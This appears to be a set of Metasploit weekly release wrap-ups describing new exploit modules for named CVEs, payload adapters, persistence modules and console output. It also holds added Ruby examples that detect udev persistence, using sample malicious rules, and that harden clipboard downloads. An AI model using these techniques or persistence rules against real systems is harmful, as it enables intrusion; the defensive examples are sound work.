Metasploit Wrap-up 06/06/25

New module content (6)

ThinManager Path Traversal (CVE-2023-27855) Arbitrary File Upload

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20138 contributed by h4x-x0r
Path: admin/networking/thinmanager_traversal_upload
AttackerKB reference: CVE-2023-27855

Description: Adds an auxiliary module targeting CVE-2023-27855, a path traversal vulnerability in ThinManager <= v13.0.1, to upload an arbitrary file to the target system as SYSTEM.

ThinManager Path Traversal (CVE-2023-2917) Arbitrary File Upload

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20141 contributed by h4x-x0r
Path: admin/networking/thinmanager_traversal_upload2
AttackerKB reference: CVE-2023-2917

Description: Adds an auxiliary module targeting CVE-2023-2917, a path traversal vulnerability in ThinManager <= v13.1.0, to upload an arbitrary file to the target system as SYSTEM.

ThinManager Path Traversal (CVE-2023-27856) Arbitrary File Download

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20139 contributed by h4x-x0r
Path: gather/thinmanager_traversal_download
AttackerKB reference: CVE-2023-27856

Description: Adds an auxiliary module targeting CVE-2023-27856, a path traversal vulnerability in ThinManager <= v13.0.1, to download an arbitrary file from the target system.

udev persistence

Author: Julien Voisin
Type: Exploit
Pull request: #19472 contributed by jvoisin
Path: linux/local/udev_persistence

Description: This adds a udev persistence module for Linux targets. The module requires root access because it creates udev rules: it writes a rule under the /lib/udev/rules.d/ directory and drops a malicious binary containing the payload. Successful exploitation requires the at binary to be present on the system.
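From the defender's side, the artefact this technique leaves behind is a rules file in a udev rules directory whose RUN entry hands a program to at (udev unconditionally kills RUN processes once event handling finishes, which is why the payload is scheduled through at rather than started directly). The following Ruby scanner is an added example written for this page, not Metasploit code and not part of the original post: it flags RUN entries that invoke at. The sample rules are constructed, and the directory list in scan_udev_rules_dirs reflects the usual udev search paths rather than anything the post states.

```ruby
# Matches RUN+="...", RUN{...}+="..." and RUN="..." / RUN:="..." entries; captures the command.
UDEV_RUN_RE = /\bRUN(?:\{[^}]*\})?\s*[+:]?=\s*"((?:[^"\\]|\\.)*)"/

# An `at` token at the start of the command or right after a separator (whitespace, quote,
# slash or shell operator). Words that merely contain "at" (e.g. cat) do not match.
AT_INVOCATION_RE = %r{(?:^|[\s'"`;|&(/])at(?=\s|$)}

# Constructed sample, not taken from any real system: lines 3 and 5 are the suspicious ones.
SAMPLE_RULES = <<~'RULES'
  # constructed sample rules
  SUBSYSTEM=="net", KERNEL!="lo", RUN+="/lib/systemd/systemd-sysctl --prefix=/net/ipv4/conf/$name"
  ACTION=="add", RUN+="/usr/bin/at -f /lib/udev/rules.d/.payload now"
  ACTION=="add", SUBSYSTEM=="usb", RUN{program}+="/bin/sh -c 'cat /tmp/x'"
  ACTION=="add", RUN+="/bin/sh -c 'at now -f /tmp/.p'"
RULES

# Returns [{file:, line:, run:}] for every RUN entry whose command invokes at.
def udev_rules_invoking_at(rules_text, file: '(inline)')
  findings = []
  rules_text.each_line.with_index(1) do |line, lineno|
    stripped = line.strip
    next if stripped.empty? || stripped.start_with?('#')

    stripped.scan(UDEV_RUN_RE) do |(command)|
      findings << { file: file, line: lineno, run: command } if command.match?(AT_INVOCATION_RE)
    end
  end
  findings
end

# Walk the rules directories udev reads (standard locations; adjust for your distribution).
def scan_udev_rules_dirs(dirs = %w[/etc/udev/rules.d /run/udev/rules.d /usr/lib/udev/rules.d /lib/udev/rules.d])
  dirs.flat_map do |dir|
    Dir.glob(File.join(dir, '*.rules')).flat_map do |path|
      udev_rules_invoking_at(File.read(path), file: path)
    end
  end
end

if $PROGRAM_NAME == __FILE__
  # With no arguments, scan the constructed sample; otherwise scan the directories given.
  hits = ARGV.empty? ? udev_rules_invoking_at(SAMPLE_RULES, file: 'sample') : scan_udev_rules_dirs(ARGV)
  hits.each { |h| puts "#{h[:file]}:#{h[:line]}: RUN invokes at: #{h[:run]}" }
end
```

A hit is not proof of compromise (legitimate rules rarely call at, but they can), so pair the finding with the file's modification time and the ownership and hash of whatever at is told to run.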

Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution

Authors: CERT-EU, Piotr Bazydlo, Sonny Macdonald, and remmons-r7
Type: Exploit
Pull request: #20265 contributed by remmons-r7
Path: multi/http/ivanti_epmm_rce_cve_2025_4427_4428
AttackerKB reference: CVE-2025-4428

Description: Adds a module chaining CVE-2025-4427, an authentication flaw that allows unauthenticated access to an administrative web API endpoint, with CVE-2025-4428, an expression language injection in that endpoint that yields code execution, on many versions of MobileIron Core (rebranded as Ivanti EPMM).

PHP Exec, PHP Command Shell, Bind TCP (via Perl)

Authors: Samy samy@samy.pl, Spencer McIntyre, cazz bmc@shmoo.com, and msutovsky-r7
Type: Payload (Adapter)
Pull request: #19976 contributed by msutovsky-r7

Description: This enables creation of PHP payloads wrapped around bash / sh commands.

This adapter adds the following payloads:

  • cmd/unix/php/bind_perl
  • cmd/unix/php/bind_perl_ipv6
  • cmd/unix/php/bind_php
  • cmd/unix/php/bind_php_ipv6
  • cmd/unix/php/download_exec
  • cmd/unix/php/exec
  • cmd/unix/php/meterpreter/bind_tcp
  • cmd/unix/php/meterpreter/bind_tcp_ipv6
  • cmd/unix/php/meterpreter/bind_tcp_ipv6_uuid
  • cmd/unix/php/meterpreter/bind_tcp_uuid
  • cmd/unix/php/meterpreter/reverse_tcp
  • cmd/unix/php/meterpreter/reverse_tcp_uuid
  • cmd/unix/php/meterpreter_reverse_tcp
  • cmd/unix/php/reverse_perl
  • cmd/unix/php/reverse_php
  • cmd/unix/php/shell_findsock

Enhancements and features (3)

  • #19900 from jvoisin - Updates the notes of multiple modules to include additional AKA (Also Known As) references for EquationGroup codenames.
  • #20263 from cdelafuente-r7 - Updates Metasploit to register VulnAttempts for both Exploit and Auxiliary modules.
  • #20277 from adfoster-r7 - Add support for Ruby 3.2.8.

Bugs fixed (7)

  • #20218 from jheysel-r7 - Fixes an issue in the web crawler's canonicalize method, which previously resulted in incorrect URIs being returned.
  • #20246 from bcoles - Fixes an issue within msfvenom when using zutto_dekiru encoder on a raw payload.
  • #20258 from zeroSteiner - Updates the datastore options in auxiliary/admin/ldap/shadow_credentials to reference the new LDAP datastore names.
  • #20260 from zeroSteiner - Updates the auxiliary/admin/ldap/change_password module to use the new LDAP datastore options.
  • #20273 from JohannesLks - This fixes multiple issues in the post/windows/manage/remove_host module that would occur when a line had multiple names on it or used tab characters instead of spaces.
  • #20275 from msutovsky-r7 - This fixes a bug in the auxiliary/scanner/sap/sap_router_info_request module that would cause it to crash when a corrupted packet was received.
  • #20281 from JohannesLks - This fixes an issue in the post/windows/manage/resolve_host module that would occur if the system wasn't installed to C:\.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro.

Metasploit Wrap-Up 05/30/2025

The internet is a series of Tube [SOCKS]

Metasploit has supported SOCKS proxies for years, acting both as a client (by setting the Proxies datastore option) and as a server (by running the auxiliary/server/socks_proxy module). While Metasploit has supported SOCKS versions 4a and 5, there has been some ambiguity about how Domain Name System (DNS) requests are made through these versions. Both 4a and 5 notably allow a client to request a connection to a host identified by hostname, in which case DNS resolution takes place on the SOCKS server. Whether a SOCKS client resolves the hostname to an address itself or leaves that to the server is an implementation detail that is inconsistent across software.

In the case of Metasploit, the framework opted to handle DNS resolution itself. This was to ensure consistent behavior when running a module with and without a proxy against a target hostname that resolves to multiple IP addresses. Many years ago, when Metasploit shifted focus to assessing targets in bulk, we decided that if a user specified a hostname that mapped to multiple IP addresses, the module should be run once for each address. This behavior is mostly intended for modules targeting web servers and can be seen by running the auxiliary/scanner/http/http_version module against a target behind a CDN such as CloudFront (it's pretty easy to guess a suitable example here).

This did, however, introduce a problem for users who intended to use Metasploit as a SOCKS client by setting the Proxies datastore option, because Metasploit performed the DNS resolution itself instead of passing the hostname to the proxy server as the user might expect. To explicitly provide what is probably the expected behavior, using the proxy server for name resolution, Metasploit has added the unofficial socks5h scheme used by cURL and other clients. The convention is that when socks5h is specified, the proxy server performs the name resolution. Metasploit users can now leverage the resolution capabilities of the SOCKS5 server, however it happens to be implemented, to initiate their connection.

To use this new capability, simply specify the server in the Proxies option as socks5h://192.0.2.0:1080 where 192.0.2.0 is the target SOCKS5 server.

At this time, Metasploit does not currently have client support for the older SOCKS4a version. If this is something that would interest you, please let us know in our ticket.

New module content (2)

WordPress Depicter Plugin SQL Injection (CVE-2025-2011)

Authors: Muhamad Visat and Valentin Lobstein
Type: Auxiliary
Pull request: #20185 contributed by Chocapikk
Path: gather/wp_depicter_sqli_cve_2025_2011
AttackerKB reference: CVE-2025-2011

Description: This adds a module for exploiting CVE-2025-2011 which is an unauthenticated SQL injection vulnerability in the "Slider & Popup Builder" plugin versions <= 3.6.1.

Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization

Authors: H00die Gr3y and Huntress Team
Type: Exploit
Pull request: #20096 contributed by h00die-gr3y
Path: windows/http/gladinet_viewstate_deserialization_cve_2025_30406
AttackerKB reference: CVE-2025-30406

Description: This adds an exploit module for Gladinet CentreStack/Triofox. The vulnerability, an unsafe ASP.NET ViewState deserialization, allows execution of arbitrary commands.

Enhancements and features (2)

  • #20147 from zeroSteiner - This adds support for the SOCKS5H protocol, allowing DNS resolution through a SOCKS5 proxy.
  • #20180 from smashery - This adds a warning to PowerShell use when an impersonation token is active.

Bugs fixed (3)

  • #20257 from cgranleese-r7 - Fixes an issue where the report_note deprecation message called a method incorrectly.
  • #20261 from bwatters-r7 - This updates the vmware_vcenter_vmdir_auth_bypass module and accompanying documentation to refer to the new datastore option name.

Documentation added (1)

You can always find more documentation on our docsite at docs.metasploit.com.

Metasploit Wrap-Up

Making Metasploit faster

This week's wrap-up includes many new modules, but the notable change is faster Metasploit loading. Thanks to bcoles, #20166 improves bootup performance when searching for a module, and #20155 reduces Metasploit's startup time.

New module content (6)

Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)

Authors: Alberto Solino and smashery
Type: Auxiliary
Pull request: #20175 contributed by smashery
Path: gather/kerberoast

Description: This adds a native Metasploit module for performing Kerberoast attacks. With the native module, users will no longer need to have Python or additional Python libraries in order to leverage the attack technique.

Ivanti Connect Secure Unauthenticated Remote Code Execution via Stack-based Buffer Overflow

Authors: Christophe De La Fuente and Stephen Fewer
Type: Exploit
Pull request: #20112 contributed by cdelafuente-r7
Path: linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457
AttackerKB reference: CVE-2025-22457

Description: Adds an exploit module targeting CVE-2025-22457, a Stack-based Buffer Overflow vulnerability in Ivanti Connect Secure 22.7R2.5 and earlier.

Clinic's Patient Management System 1.0 - Unauthenticated RCE

Authors: Ashish Kumar and msutovsky-r7
Type: Exploit
Pull request: #20177 contributed by msutovsky-r7
Path: multi/http/clinic_pms_sqli_to_rce
AttackerKB reference: CVE-2025-3096

Description: Clinic's Patient Management System contains a SQL injection vulnerability in its login form. The module uses this vulnerability (CVE-2025-3096) to gain unauthorized access to the application and then chains a second vulnerability (CVE-2022-2297) to gain remote code execution.

Invision Community 5.0.6 customCss RCE

Authors: Egidio Romano (EgiX) and Valentin Lobstein
Type: Exploit
Pull request: #20214 contributed by Chocapikk
Path: multi/http/invision_customcss_rce
AttackerKB reference: CVE-2025-47916

Description: This adds a new exploit module for Invision Community versions up to and including 5.0.6, which are vulnerable to remote code injection in the theme editor's customCss endpoint (CVE-2025-47916). The module leverages the malformed {expression="…"} construct to evaluate arbitrary PHP expressions and supports both in-memory PHP payloads and direct system command execution.

Nextcloud Workflows Remote Code Execution

Authors: Armend Gashi, Enis Maholli, arianitisufi, and whotwagner
Type: Exploit
Pull request: #20020 contributed by whotwagner
Path: unix/webapp/nextcloud_workflows_rce
AttackerKB reference: CVE-2023-26482

Description: This adds a module for Nextcloud Workflows (CVE-2023-26482). Exploitation requires a set of valid credentials, and the Nextcloud instance must have the Workflow external script app installed and enabled.

Samsung MagicINFO 9 Server Remote Code Execution (CVE-2024-7399)

Authors: Michael Heinzl and SSD Secure Disclosure
Type: Exploit
Pull request: #20188 contributed by h4x-x0r
Path: windows/http/magicinfo_traversal
AttackerKB reference: CVE-2024-7399

Description: This adds a module for CVE-2024-7399, an arbitrary file write as SYSTEM. The module drops a shell by exploiting this vulnerability, allowing remote code execution. The application listens on TCP port 7001 for HTTP and TCP port 7002 for HTTPS.

Enhancements and features (3)

  • #20155 from bcoles - This reduces Metasploit's startup time.
  • #20175 from smashery - This adds a native Metasploit module for performing Kerberoast attacks. With the native module, users will no longer need to have Python or additional Python libraries in order to leverage the attack technique.
  • #20176 from smashery - This updates the ASREP roasting module (auxiliary/gather/asrep) to store the hashes in the database.

Bugs fixed (4)

  • #20166 from bcoles - Improves the bootup performance of msfconsole when searching for module platform classes.
  • #20179 from adfoster-r7 - This bumps the version of Metasploit Payloads to include a fix for the Java Meterpreter's symlink handling on Windows.
  • #20194 from adfoster-r7 - Fixes a bug in the thinkphp RCE module that opted it out of auto-exploitation in Metasploit Pro.
  • #20207 from zeroSteiner - This adds a quick fix for the new auxiliary/gather/kerberoast module to ensure that the KrbCacheMode datastore option is honored, so the user can choose whether or not the module uses cached credentials.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Metasploit Wrap-Up 05/16/2025

New modules for everyone

This week's release is packed with new module content. We have RCE modules for Car Rental System 1.0 and for the WordPress plugins SureTriggers and User Registration and Membership. We also have a persistence module for the LINQPad software and an auxiliary module for POWERCOM UPSMON PRO. We have also added support for 32-bit architectures to our execute-assembly post module, which now supports injection of both 64-bit and 32-bit .NET assemblies.

New module content (5)

POWERCOM UPSMON PRO Path Traversal (CVE-2022-38120) and Credential Harvester (CVE-2022-38121)

Author: Michael Heinzl
Type: Auxiliary
Pull request: #20123 contributed by h4x-x0r
Path: gather/upsmon_traversal
AttackerKB reference: CVE-2022-38121

Description: This adds an auxiliary module for two vulnerabilities in POWERCOM UPSMON PRO: a path traversal and a credential disclosure. The first allows a user to traverse the path in the request URI and read arbitrary files that the given user account is permitted to access. The second exposes sensitive UPSMON credentials, which are stored in plaintext in a readable file.

Car Rental System 1.0 File Upload RCE (Authenticated)

Author: Aaryan Golatkar
Type: Exploit
Pull request: #20026 contributed by aaryan-11-x
Path: multi/http/carrental_fileupload_rce
AttackerKB reference: CVE-2024-57487

Description: This adds a module for a file upload vulnerability in Car Rental System 1.0. It requires administrator credentials to exploit.

WordPress SureTriggers Auth Bypass and RCE

Authors: Khaled Alenazi (Nxploited), Michael Mazzolini (mikemyers), and Valentin Lobstein
Type: Exploit
Pull request: #20146 contributed by Chocapikk
Path: multi/http/wp_suretriggers_auth_bypass
AttackerKB reference: CVE-2025-3102

Description: Adds a new exploit module for the WordPress SureTriggers plugin (<= 1.0.78) that abuses CVE-2025-3102, an authentication bypass exposing a REST endpoint, to create an administrative user and achieve remote code execution.

WP User Registration and Membership Unauthenticated Privilege Escalation (CVE-2025-2563)

Authors: Valentin Lobstein and wesley (wcraft)
Type: Exploit
Pull request: #20159 contributed by Chocapikk
Path: multi/http/wp_user_registration_membership_escalation
AttackerKB reference: CVE-2025-2563

Description: This adds a module for a privilege escalation vulnerability in the User Registration and Membership plugin for WordPress. It allows creating new users with administrator privileges.

LINQPad Deserialization Exploit

Authors: James Williams and msutovsky-r7 martin_sutovsky@rapid7.com
Type: Exploit
Pull request: #19777 contributed by msutovsky-r7
Path: windows/local/linqpad_deserialization_persistence
AttackerKB reference: CVE-2024-53326

Description: Adds a module to install persistence relying on CVE-2024-53326, a .NET deserialization vulnerability in the startup of Linqpad versions prior to 5.52.

Enhancements and features (3)

  • #20098 from smashery - Adds support for 32-bit execute-assembly, allowing injection of 64-bit or 32-bit .NET assembly.
  • #20126 from bcoles - This adds a Linux post-exploitation method to check Yama's ptrace_scope setting. It removes a round trip that was previously required to obtain the value, so modules that need it run slightly faster.
  • #20173 from adfoster-r7 - Updates the web crawling modules to support HTTP logging.

Bugs fixed (8)

  • #20010 from lafried - This fixes a missing PowerShell signature used when identifying the platform over SSH.
  • #20111 from cdelafuente-r7 - Fixes an issue that prevented failed exploit attempts from being registered in the database correctly.
  • #20118 from zeroSteiner - This fixes the target option for the smb_to_ldap module: RELAY_TARGETS is now outdated and RHOSTS should be used instead.
  • #20120 from bcoles - This fixes typos across many Windows post-exploit modules and adds missing metadata.
  • #20128 from bcoles - This fixes an IP address assignment in the auxiliary/bnat/bnat_router module.
  • #20142 from L-codes - Fixes a crash when running unknown commands in msfconsole when using specific versions of Ruby and bundler.
  • #20156 from bcoles - This fixes typos and RuboCop violations in the post modules.
  • #20181 from bwatters-r7 - This fixes an issue in Metasploit's WordPress login functionality that caused it to fail for certain target configurations.

Documentation added (1)

  • #20151 from adfoster-r7 - Updates the Wiki to include the latest available download links.

You can always find more documentation on our docsite at docs.metasploit.com.

Metasploit Wrap-Up 05/09/2025

New Toys and New Techniques

This release features a new OPNSense login scanner, a module targeting the Sante PACS path traversal vulnerability, an additional method for stealing Network Access Account credentials via SMB to HTTP relay, and the Erlang/OTP SSH exploit everyone was excited about.

New module content (4)

Sante PACS Server Path Traversal (CVE-2025-2264)

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20124 contributed by h4x-x0r
Path: gather/pacsserver_traversal
AttackerKB reference: CVE-2025-2264

Description: This adds an auxiliary module for CVE-2025-2264. The vulnerability is present in Sante PACS Server and allows an attacker to perform path traversal to read arbitrary files.

OPNSense Login Scanner

Author: sjanusz-r7
Type: Auxiliary
Pull request: #19992 contributed by sjanusz-r7
Path: scanner/http/opnsense_login

Description: This adds a login scanner module for OPNSense.

SMB to HTTP relay version of Get NAA Creds

Authors: jheysel-r7, skelsec, smashery, and xpn
Type: Auxiliary
Pull request: #19952 contributed by jheysel-r7
Path: server/relay/relay_get_naa_credentials

Description: This adds a new module for obtaining NAA credentials from SCCM by authenticating through a relayed SMB connection.

Erlang OTP Pre-Auth RCE Scanner and Exploit

Authors: Horizon3 Attack Team, Martin Kristiansen, Matt Keeley, and mekhalleh (RAMELLA Sebastien)
Type: Exploit
Pull request: #20060 contributed by mekhalleh
Path: linux/ssh/ssh_erlangotp_rce
AttackerKB reference: CVE-2025-32433

Description: This adds a module which exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH servers that allows for remote command execution as the root user. By sending crafted SSH packets, it executes a Metasploit payload to establish a session on the target system.

Enhancements and features (4)

  • #20027 from e2002e - This adds support for Shodan facets.
  • #20115 from cgranleese-r7 - Updates multiple HTTPS modules to support a new SSLKeyLogFile option, which writes the TLS session secrets to a file so that diagnostic and logging tools that read this format, such as Wireshark, can decrypt the captured traffic.
  • #20116 from bcoles - This adds support for .library-ms files in Windows SMB multi dropper.
  • #20127 from bcoles - This improves the start up time of msfconsole when run with the default options by not sorting module options at load time.

Bugs fixed (1)

  • #20148 from adfoster-r7 - This fixes an issue where SSL connections made by Metasploit would fail when the Server Name Indication (SNI) extension was in use.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Metasploit Wrap-Up 05/02/2025

Meterpreter Extended API Clipboard Monitoring

Security is hard, and open source security is a collaborative effort. This week, Metasploit released a fix for a vulnerability that was privately disclosed to us by long-time community member bcoles. The vulnerability impacted Metasploit users who were using the clipboard monitoring functionality in the extended-API Meterpreter extension (extapi). After enabling monitoring, a user would typically run clipboard_monitor_stop or clipboard_monitor_dump to retrieve information from the compromised host. The vulnerability existed in Metasploit's handling of files that may be present in the remote host's clipboard. When files were downloaded, they were by default written to the current working directory and would overwrite any existing files.

An attacker could leverage this by placing a malicious file in their clipboard and waiting for the Metasploit operator to download it and later execute it. For example, an attacker could assume that the operator is running Metasploit from the framework's own directory and place a malicious Ruby file named msfconsole in their clipboard. When the operator dumps the contents of the remote clipboard, their local copy of msfconsole is overwritten and then executed the next time they start Metasploit. It should be noted that the path of the written file is printed in the command's output, but it may be overlooked by the user.

With the changes introduced in #19938, the extapi clipboard monitoring commands have been updated to make this significantly more difficult. Two primary changes were made. Metasploit now requires the user to specify a directory where file contents should be written. Additionally, existing files are no longer overwritten automatically: to overwrite a file, the user must pass the --force argument. If a file would be or has been overwritten, it is noted in the output:

meterpreter > clipboard_monitor_dump -d test_dir --force -p
Files captured at 2025-04-01 19:11:30.0503
==========================================
Remote Path : C:\Users\smcintyre\Desktop\hello-world.txt
File size   : 11 bytes
Downloading : C:\Users\smcintyre\Desktop\hello-world.txt -> /home/smcintyre/Repositories/metasploit-framework.pr/test_dir/hello-world.txt
Downloaded 11.00 B of 11.00 B (100.0%) : C:\Users\smcintyre\Desktop\hello-world.txt -> /home/smcintyre/Repositories/metasploit-framework.pr/test_dir/hello-world.txt
Completed   : Overwrote existing file /home/smcintyre/Repositories/metasploit-framework.pr/test_dir/hello-world.txt
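The two rules above (a mandatory destination directory and no overwrite without --force) together with the obvious third one, never trusting the remote file name, can be captured in a small path-resolution function. The following is an added Ruby example written for this page; it is not the framework's code and not part of the original post. The DownloadRefused class, the injected `existing` predicate (so the example runs without touching the filesystem) and the file names are illustrative.

```ruby
# Raised when a clipboard file must not be written where the caller asked.
class DownloadRefused < StandardError; end

# Decide where a file captured from a remote clipboard may be written locally.
#
# remote_path is attacker-controlled, so only its basename is used, with both Windows
# and POSIX separators honoured: "..\\..\\msfconsole" is reduced to "msfconsole".
# dest_dir is mandatory (the -d argument in the post); an existing file is replaced only
# when force is true (--force). `existing` is a predicate so tests need no real files.
#
# Returns [local_path, :created] or [local_path, :overwrote].
def local_download_path(remote_path, dest_dir:, force: false, existing: ->(p) { File.exist?(p) })
  raise DownloadRefused, 'a destination directory (-d) is required' if dest_dir.nil? || dest_dir.empty?

  base = remote_path.to_s.split(%r{[\\/]+}).last.to_s
  raise DownloadRefused, "unusable remote file name: #{remote_path.inspect}" if base.empty? || %w[. ..].include?(base)

  dest = File.join(dest_dir, base)

  # A bare basename cannot traverse, but verify the resolved path stays under dest_dir anyway.
  root = File.join(File.expand_path(dest_dir), '')
  raise DownloadRefused, "refusing to write outside #{dest_dir}" unless File.expand_path(dest).start_with?(root)

  if existing.call(dest)
    raise DownloadRefused, "#{dest} exists; pass --force to overwrite it" unless force
    return [dest, :overwrote]
  end
  [dest, :created]
end

if $PROGRAM_NAME == __FILE__
  # Illustrative remote paths; the second one is the scenario from the post.
  ['C:\\Users\\victim\\Desktop\\hello-world.txt', '..\\..\\msfconsole'].each do |remote|
    path, status = local_download_path(remote, dest_dir: 'test_dir', existing: ->(_p) { false })
    puts "#{remote} -> #{path} (#{status})"
  end
end
```

The status value is what the caller should surface in the command output, as the "Completed : Overwrote existing file" line above does, so an operator who passed --force still sees exactly which local file was replaced.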

The Metasploit team would like to thank bcoles for bringing this issue to our attention. We have assigned it CVE-2025-3095 and evaluated it with a CVSS score of 5.0 / Medium (CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P). This vulnerability was fixed in Metasploit version 6.4.60, released on April 30th, 2025.

New module content (2)

LDAP Password Disclosure

Authors: Hynek Petrak, Spencer McIntyre, Thomas Seigneuret, and Tyler Booth
Type: Auxiliary
Pull request: #20017 contributed by zeroSteiner
Path: gather/ldap_passwords

Description: This updates and renames the ldap_hashdump module to ldap_passwords, extending its functionality to extract secrets used by LAPSv1 and LAPSv2 in Active Directory environments, alongside existing LDAP implementations. It simplifies usage by unifying techniques under one module and avoids requiring users to fingerprint the server type. Associated tests were also updated to include AD-specific data using Samba as a test LDAP server.

WonderCMS Remote Code Execution

Authors: Milad "Ex3ptionaL" Karimi and msutovsky-r7
Type: Exploit
Pull request: #20081 contributed by msutovsky-r7
Path: multi/http/wondercms_rce
AttackerKB reference: CVE-2023-41425

Description: Adds a new module, exploit/multi/http/wondercms_rce, which exploits CVE-2023-41425, a file upload vulnerability. The module authenticates against the vulnerable WonderCMS instance with the supplied password, creates a zip file containing a malicious PHP file and uploads it. The application automatically extracts the archive into the /themes directory, where the PHP file is then executed.

Enhancements and features (1)

  • #20110 from bcoles - Improves code quality, metadata, and fixes some edge-case bugs within the modules/post/osx modules.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Metasploit Wrap-Up 04/25/2025

AD CS workflow improvement with new PKCS12 features

Given the increasing popularity of AD CS misconfiguration exploitation in recent years, Metasploit has been consistently improving its capabilities in this area. This week’s release introduces a new certs command to the msfconsole, enabling users to manage PKCS12 certificates stored in the database, similar to the klist command. The certs command provides functionalities such as listing, searching, activating, deactivating, exporting, and deleting certificates.

Available options:

msf6 auxiliary(scanner/smb/smb_login) > certs --help
List Pkcs12 certificate bundles in the database
Usage: certs [options] [username[@domain_upn_format]]

OPTIONS:

    -a, --activate    Activates *all* matching pkcs12 entries
    -A, --deactivate  Deactivates *all* matching pkcs12 entries
    -d, --delete      Delete *all* matching pkcs12 entries
    -e, --export      The file path where to export the matching pkcs12 entry
    -h, --help        Help banner
    -i, --index       Pkcs12 entry ID(s) to search for, e.g. `-i 1` or `-i 1,2,3` or `-i 1 -i 2 -i 3`
    -v, --verbose     Verbose output

Example output:

msf6 auxiliary(admin/dcerpc/icpr_cert) > certs
Pkcs12
======
id  username       realm         subject    issuer                                              ADCS CA                   ADCS Template  status
--  --------       -----         -------    ------                                              -------                   -------------  ------
1   administrator  mydomi.local  /CN=muser  /DC=local/DC=pro/DC=ad/CN=mssrv-dc-mydomi.local-CA  mssrv-dc-mydomi.local-CA  ESC1           active

Additionally, it automates PKCS12 authentication via PKINIT when the kerberos option is selected for authentication and no Kerberos tickets are found in the cache. This allows the framework to transparently use stored certificates to acquire Kerberos tickets, streamlining authentication for modules that support the Kerberos and Schannel protocols. Any module supporting these authentication protocols can benefit, as long as a suitable certificate is present in the database.

Here is an example with the scanner/winrm/winrm_cmd module. This shows how the Kerberos tickets are automatically retrieved using a PKCS12 stored in the database (see the output of the certs command above):

msf6 auxiliary(admin/dcerpc/icpr_cert) > klist
Kerberos Cache
==============
No tickets
msf6 auxiliary(scanner/winrm/winrm_cmd) > run verbose=true RHOSTS=10.100.32.94 Winrm::Auth=kerberos Winrm::Rhostname=mspro-dc username=administrator domain=mydomi.local DomainControllerRhost=10.100.32.94 cmd=whoami
[*] Using stored certificate for administrator@mydomi.local
[+] 10.100.32.94:88 - Received a valid TGT-Response
[*] 10.100.32.94:5985     - TGT MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20241218141549_default_10.100.32.94_mit.kerberos.cca_125955.bin
[+] 10.100.32.94:88 - Received a valid TGS-Response
[*] 10.100.32.94:5985     - TGS MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20241218141549_default_10.100.32.94_mit.kerberos.cca_751667.bin
[+] 10.100.32.94:88 - Received a valid delegation TGS-Response
[+] 10.100.32.94:88 - Received AP-REQ. Extracting session key...
ad\administrator
[+] Results saved to /home/n00tmeg/.msf4/loot/20241218141553_default_10.100.32.94_winrm.cmd_result_401191.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

New module content (1)

BentoML's runner server RCE

Authors: SeaWind and Takahiro Yokoyama
Type: Exploit
Pull request: #20046 contributed by Takahiro-Yoko
Path: linux/http/bentoml_runner_server_rce_cve_2025_32375
AttackerKB reference: CVE-2025-32375

Description: This adds an exploit module for an insecure deserialization in BentoML's runner server which leads to unauthenticated RCE. Versions prior to 1.4.8 but after 1.0.0a1 are affected.

Enhanced modules (2)

Modules which have either been enhanced, or renamed:

  • #20044 from jheysel-r7 - Adds a target to the service_permissions module supporting CVE-2025-21293, allowing a lower privileged user to add a DLL entry to HKLM\System\CurrentControlSet\Services\Dnscache\ and coerce execution of the DLL as system.
  • #20052 from bcoles - Moves the module exploits/dialup/multi/login/manyargs to exploits/solaris/dialup/manyargs.

Enhancements and features (11)

  • #19760 from cdelafuente-r7 - This introduces a new certs command that allows users to manage and display PKCS12 certificates stored in the credentials database, with options for searching, exporting, activating, and deleting certificates. It also enables automatic PKCS12-based Kerberos (and Schannel) authentication through PKINIT when no Kerberos ticket is cached, streamlining TGT acquisition using existing certificates. This enhances both usability and flexibility when working with certificate-based authentication workflows.
  • #20028 from jheysel-r7 - This change modifies the existing pgAdmin modules by replacing some of their functionality with a new pgAdmin library.
  • #20049 from bcoles - Improves the check method metadata for modules/exploits/mainframe/ftp/ftp_jcl_creds.
  • #20052 from bcoles - Moves the module exploits/dialup/multi/login/manyargs to exploits/solaris/dialup/manyargs.
  • #20057 from bcoles - Improves the code quality of the example modules included in Metasploit.
  • #20059 from bcoles - Improves the code quality of multiple payload modules.
  • #20065 from bcoles - Improves the metadata and code quality for the exploits/hpux/lpd/cleanup_exec module.
  • #20066 from bcoles - Enhances the code quality of multiple payloads/singles modules, and fixes nested method definitions in 6 pingback modules.
  • #20068 from bcoles - Improves the exploits/solaris/sunrpc/sadmind_adm_build_path and exploits/solaris/sunrpc/sadmind_exec modules to have check methods, improved metadata, and code quality.
  • #20069 from sjanusz-r7 - Allow overwriting reported module name within the report_vuln API.
  • #20077 from adfoster-r7 - Updates the haraka module to work with Python 3.12 and above.

Bugs fixed (3)

  • #20051 from bcoles - Fixes out-of-date metadata for the exploits/dialup/multi/login/manyargs module, and fixes a logic bug when handling bad characters.
  • #20063 from bcoles - Updates Ruby pingback payloads to correctly close the opened socket after use.
  • #20064 from bcoles - Fixes IPv6 support in the cmd/unix/reverse_php_ssl payload.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

